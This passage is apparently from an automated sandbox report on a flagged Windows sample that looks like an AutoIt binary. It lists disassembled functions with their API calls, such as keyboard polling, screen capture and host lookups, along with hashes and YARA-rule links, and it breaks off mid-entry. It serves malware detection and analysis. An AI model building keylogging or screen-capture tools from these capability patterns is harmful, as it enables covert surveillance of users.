                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              • Opcode ID: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                              • Instruction ID: 1394f4c043c1f23bf4a87e07d61ea07638d899ea275ec31f9a8e6c7030f6006e
                              • Opcode Fuzzy Hash: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                              • Instruction Fuzzy Hash: 6961297190020AEFDF10DFA5EC45AAEBBB9FF04710F14826AE915E6291DB319A05DF60
                              Function 008F762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(00000000), ref: 008F76A2
                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F76AE
                              • CreateCompatibleDC.GDI32(?), ref: 008F76BA
                              • SelectObject.GDI32(00000000,?), ref: 008F76C7
                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F771B
                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7757
                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F777B
                              • SelectObject.GDI32(00000006,?), ref: 008F7783
                              • DeleteObject.GDI32(?), ref: 008F778C
                              • DeleteDC.GDI32(00000006), ref: 008F7793
                              • ReleaseDC.USER32(00000000,?), ref: 008F779E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                              • String ID: (
                              • API String ID: 2598888154-3887548279
                              • Opcode ID: 260b16c3a2be860e3a76818664d999f8058cc620b23c27e3dd33630fc05fba44
                              • Instruction ID: 14888f5f825add8324051bba3b41573a6b0a595a3337e4e0b2c714af422b3b87
                              • Opcode Fuzzy Hash: 260b16c3a2be860e3a76818664d999f8058cc620b23c27e3dd33630fc05fba44
                              • Instruction Fuzzy Hash: F6513975904209EFDB25CFA8CC84EAEBBB9FF48310F14842DEA4AD7210D731A9408B60
                              Function 008EA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(00000066,?,00000FFF,0090FB78), ref: 008EA0FC
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 008EA11E
                              • __swprintf.LIBCMT ref: 008EA177
                              • __swprintf.LIBCMT ref: 008EA190
                              • _wprintf.LIBCMT ref: 008EA246
                              • _wprintf.LIBCMT ref: 008EA264
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LoadString__swprintf_wprintf$_memmove
                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 311963372-2391861430
                              • Opcode ID: 8f4e08523f03dc0bb250dbc7b0bf6969e9ceed1687d165c6a7f073c4f92d75c1
                              • Instruction ID: c9b67160fddf37ddd7db693e265654679f8093fc0b0f48f4ff53ed539daec4a8
                              • Opcode Fuzzy Hash: 8f4e08523f03dc0bb250dbc7b0bf6969e9ceed1687d165c6a7f073c4f92d75c1
                              • Instruction Fuzzy Hash: 15516B71904209AACF19FBA4CD86EEEB779FF05704F200165B515B20A1EB31AF58DB62
                              Function 00886BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886C6C,?,00008000), ref: 008A0BB7
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00886E5A
                                • Part of subcall function 008859CD: _wcscpy.LIBCMT ref: 00885A05
                                • Part of subcall function 008A387D: _iswctype.LIBCMT ref: 008A3885
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                              • API String ID: 537147316-1018226102
                              • Opcode ID: 00c7d0ca98f900f7f5eb748c128b0096ec7927decfa650743c2012ea41d1126c
                              • Instruction ID: 583ed90971c55937dfe1563b01fd77d238c972fbfe5f63c98430beb6d33d4153
                              • Opcode Fuzzy Hash: 00c7d0ca98f900f7f5eb748c128b0096ec7927decfa650743c2012ea41d1126c
                              • Instruction Fuzzy Hash: 310234311083419EC724EF28C891AAEBBE5FF99354F14492DF596D72A2DB30DA49CB43
                              Function 008845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008845F9
                              • GetMenuItemCount.USER32(00946890), ref: 008BD7CD
                              • GetMenuItemCount.USER32(00946890), ref: 008BD87D
                              • GetCursorPos.USER32(?), ref: 008BD8C1
                              • SetForegroundWindow.USER32(00000000), ref: 008BD8CA
                              • TrackPopupMenuEx.USER32(00946890,00000000,?,00000000,00000000,00000000), ref: 008BD8DD
                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008BD8E9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                              • String ID:
                              • API String ID: 2751501086-0
                              • Opcode ID: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                              • Instruction ID: 20216ce75b9bf57c0c30458220325eeb4aa9400ebb4996a8d6afe94998c6029b
                              • Opcode Fuzzy Hash: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                              • Instruction Fuzzy Hash: 5171F27160421ABEFB209F15DC45FEABF69FB05368F200216F524EA2E1DBB16810DB95
                              Function 009010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                              Download Yara Rule
                              APIs
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                              • API String ID: 3964851224-909552448
                              • Opcode ID: 38d79650226896880bdb156b7a05b7899dc00572f7076fc0e915bfd81109f4d1
                              • Instruction ID: 9452302e9df7bfaedb018e49adcc7c1f2ef4e1a1dadf97f472227ae63eda6097
                              • Opcode Fuzzy Hash: 38d79650226896880bdb156b7a05b7899dc00572f7076fc0e915bfd81109f4d1
                              • Instruction Fuzzy Hash: D5418B7110424E8FDF24EF98D991AEA3768FF26300F104514EDA19B292DB34A91ACB62
                              Function 008E5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 00887A84: _memmove.LIBCMT ref: 00887B0D
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E55D2
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E55E8
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E55F9
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E560B
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E561C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: SendString$_memmove
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 2279737902-1007645807
                              • Opcode ID: d81dee642bf6b60b09820581d7744b891bbb65fc1ec6a0bf2fd537d589f910e4
                              • Instruction ID: 0196e7acf03e139eed939550c14f7a1bbbbaddeabc7515ea3271d77445d05ad5
                              • Opcode Fuzzy Hash: d81dee642bf6b60b09820581d7744b891bbb65fc1ec6a0bf2fd537d589f910e4
                              • Instruction Fuzzy Hash: 5011C42056016979D724B6A6CC8ADFF7B7CFFE2F08F500429B445E20D1EE605E05CAA2
                              Function 008E48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 208665112-3771769585
                              • Opcode ID: edd88e2848c4902cccf0cd64e6010c011f6148d18dffb27b7b8ad2a84c850762
                              • Instruction ID: 3a8266d41b5c5dbf7c444f9904627165cce231752c1a40a9bdaf5f1d2c0a2561
                              • Opcode Fuzzy Hash: edd88e2848c4902cccf0cd64e6010c011f6148d18dffb27b7b8ad2a84c850762
                              • Instruction Fuzzy Hash: 2611D831908114AFDB30FB299C49EDB7BACFB42710F044175F449E6462EFB09A819652
                              Function 008E5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • timeGetTime.WINMM ref: 008E521C
                                • Part of subcall function 008A0719: timeGetTime.WINMM(?,75C0B400,00890FF9), ref: 008A071D
                              • Sleep.KERNEL32(0000000A), ref: 008E5248
                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 008E526C
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E528E
                              • SetActiveWindow.USER32 ref: 008E52AD
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E52BB
                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E52DA
                              • Sleep.KERNEL32(000000FA), ref: 008E52E5
                              • IsWindow.USER32 ref: 008E52F1
                              • EndDialog.USER32(00000000), ref: 008E5302
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                              • String ID: BUTTON
                              • API String ID: 1194449130-3405671355
                              • Opcode ID: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                              • Instruction ID: c987a0e248b7787d335a58fa95170f049e1f034ac80e10348e32cef4500660b0
                              • Opcode Fuzzy Hash: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                              • Instruction Fuzzy Hash: F421A47412C748AFE7105FA1EC98E267B69FB4734AF000434F501C6AB1CBA19D40AB62
                              Function 008ED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CoInitialize.OLE32(00000000), ref: 008ED855
                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED8E8
                              • SHGetDesktopFolder.SHELL32(?), ref: 008ED8FC
                              • CoCreateInstance.OLE32(00912D7C,00000000,00000001,0093A89C,?), ref: 008ED948
                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED9B7
                              • CoTaskMemFree.OLE32(?,?), ref: 008EDA0F
                              • _memset.LIBCMT ref: 008EDA4C
                              • SHBrowseForFolderW.SHELL32(?), ref: 008EDA88
                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008EDAAB
                              • CoTaskMemFree.OLE32(00000000), ref: 008EDAB2
                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008EDAE9
                              • CoUninitialize.OLE32(00000001,00000000), ref: 008EDAEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                              • String ID:
                              • API String ID: 1246142700-0
                              • Opcode ID: be7f5d0d57376863facc86f1ff0f335a6d4bb971824ca2d33a2f1765b42571b5
                              • Instruction ID: 033373c0169dda28459cdca66ab8f7ba1044b58ac740a4633997216b16f2d70b
                              • Opcode Fuzzy Hash: be7f5d0d57376863facc86f1ff0f335a6d4bb971824ca2d33a2f1765b42571b5
                              • Instruction Fuzzy Hash: 7EB10D75A00219AFDB14DFA9C888DAEBBF9FF49304B048469F905EB251DB30EE45CB51
                              Function 008E052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 008E05A7
                              • SetKeyboardState.USER32(?), ref: 008E0612
                              • GetAsyncKeyState.USER32(000000A0), ref: 008E0632
                              • GetKeyState.USER32(000000A0), ref: 008E0649
                              • GetAsyncKeyState.USER32(000000A1), ref: 008E0678
                              • GetKeyState.USER32(000000A1), ref: 008E0689
                              • GetAsyncKeyState.USER32(00000011), ref: 008E06B5
                              • GetKeyState.USER32(00000011), ref: 008E06C3
                              • GetAsyncKeyState.USER32(00000012), ref: 008E06EC
                              • GetKeyState.USER32(00000012), ref: 008E06FA
                              • GetAsyncKeyState.USER32(0000005B), ref: 008E0723
                              • GetKeyState.USER32(0000005B), ref: 008E0731
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                              • Instruction ID: 615c184612666c984d685d9306af7103395d8b524629cf1f9b17ac7db80324d6
                              • Opcode Fuzzy Hash: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                              • Instruction Fuzzy Hash: 1F51CB70A047C419FF35DBA588547EABFB4EF13340F08499995C2961C2D6A49BCCCF62
                              Function 008DC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 008DC746
                              • GetWindowRect.USER32(00000000,?), ref: 008DC758
                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC7B6
                              • GetDlgItem.USER32(?,00000002), ref: 008DC7C1
                              • GetWindowRect.USER32(00000000,?), ref: 008DC7D3
                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC827
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC835
                              • GetWindowRect.USER32(00000000,?), ref: 008DC846
                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC889
                              • GetDlgItem.USER32(?,000003EA), ref: 008DC897
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC8B4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC8C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                              • Instruction ID: aa58b601442c8da2662d3927d2ceddef105db1f470d2c7770b6245350e5c14d2
                              • Opcode Fuzzy Hash: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                              • Instruction Fuzzy Hash: 47512E71B10209AFDB18CF69DD99AAEBBBAFB88311F148239F515D7290D7709E00DB50
                              Function 0088201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                              • KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                              • DestroyAcceleratorTable.USER32(00000000), ref: 008BBEF6
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF27
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF3E
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF5A
                              • DeleteObject.GDI32(00000000), ref: 008BBF6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                              • String ID:
                              • API String ID: 641708696-0
                              • Opcode ID: ebb8eb21e49b91ed8ee153acc009e86a0d468aad2e1ab493e84aee89560febb6
                              • Instruction ID: afe006d647895f69efd38dffc80e90cfd8e355a48d2473512912d1e836efb073
                              • Opcode Fuzzy Hash: ebb8eb21e49b91ed8ee153acc009e86a0d468aad2e1ab493e84aee89560febb6
                              • Instruction Fuzzy Hash: 55619B79128B14DFDB35AF18DD48B69B7F1FF42316F108528E042D6A60CB71A981EF92
                              Function 008821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              • GetSysColor.USER32(0000000F), ref: 008821D3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ColorLongWindow
                              • String ID:
                              • API String ID: 259745315-0
                              • Opcode ID: 78430658e1f4c454d4523bd7375796420b9cb53753c3c1275dee34c6d6abf88d
                              • Instruction ID: b910125abee0866ad204e89d0556c007ccc30b87d03f0e6d57bf45d4d02fa650
                              • Opcode Fuzzy Hash: 78430658e1f4c454d4523bd7375796420b9cb53753c3c1275dee34c6d6abf88d
                              • Instruction Fuzzy Hash: 1C41B231108144AFDB21AF28DC98BB97B66FB46335F144365FD65CA2E2C7318D42EB61
                              Function 008EAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                              Download Yara Rule
                              APIs
                              • CharLowerBuffW.USER32(?,?,0090F910), ref: 008EAB76
                              • GetDriveTypeW.KERNEL32(00000061,0093A620,00000061), ref: 008EAC40
                              • _wcscpy.LIBCMT ref: 008EAC6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy
                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 2820617543-1000479233
                              • Opcode ID: a6ee15f86e2e931e5f907f080d7a2fe7c2280932969c786e03b0a865bc569088
                              • Instruction ID: ca58795ec24828b2e7531f94f184ae821c7ea1d2079451991dd517526fbb0028
